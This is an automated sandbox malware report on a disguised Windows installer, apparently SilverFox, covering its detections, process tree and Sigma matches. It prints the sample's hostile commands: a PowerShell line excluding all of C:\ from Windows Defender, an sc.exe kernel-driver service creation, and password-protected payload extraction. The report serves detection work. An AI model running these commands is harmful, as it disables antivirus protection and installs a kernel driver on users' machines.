Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b2.0.7.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b2.0.7.exe
renamed because original name is a hash value
Original sample name:2.0.7.exe
Analysis ID:1580396
MD5:d4c8420bea7c19a44ab6ad71fd8dde34
SHA1:32357f3fbd634ec73d11a2322e317b6c2d50e1b4
SHA256:25147cff7a4bd1554ca3d0fa3549982132be1c59f75881786e5457ff3128ff6a
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b2.0.7.exe (PID: 2716 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" MD5: D4C8420BEA7C19A44AB6AD71FD8DDE34)
    • #U5b89#U88c5#U52a9#U624b2.0.7.tmp (PID: 6000 cmdline: "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" MD5: E4680C0AB69900E6A19A0AA38BD54AAD)
      • powershell.exe (PID: 6648 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 4676 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b2.0.7.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT MD5: D4C8420BEA7C19A44AB6AD71FD8DDE34)
        • #U5b89#U88c5#U52a9#U624b2.0.7.tmp (PID: 6664 cmdline: "C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$20478,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT MD5: E4680C0AB69900E6A19A0AA38BD54AAD)
          • 7zr.exe (PID: 5596 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6172 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 2820 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7060 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1292 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6532 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5964 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1272 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5488 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6580 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6416 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 412 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1488 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5856 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5972 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2920 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6640 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6524 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3712 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6656 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5948 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1848 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5776 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5972 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6396 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2448 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4092 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5536 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6532 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3712 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5512 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2448 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3116 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5776 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3712 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5964 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4092 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1276 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp, ParentProcessId: 6000, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6648, ProcessName: powershell.exe
Sigma detected: New Kernel Driver Via SC.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7060, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 1292, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp, ParentProcessId: 6000, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6648, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7060, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 1292, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp, ParentProcessId: 6000, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6648, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\update.vacReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\update.vacReversingLabs: Detection: 23%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.0% probability
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2122040104.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2121917091.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9BB430 FindFirstFileA,FindClose,FindClose,6_2_6C9BB430
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00DA6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00DA7496
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
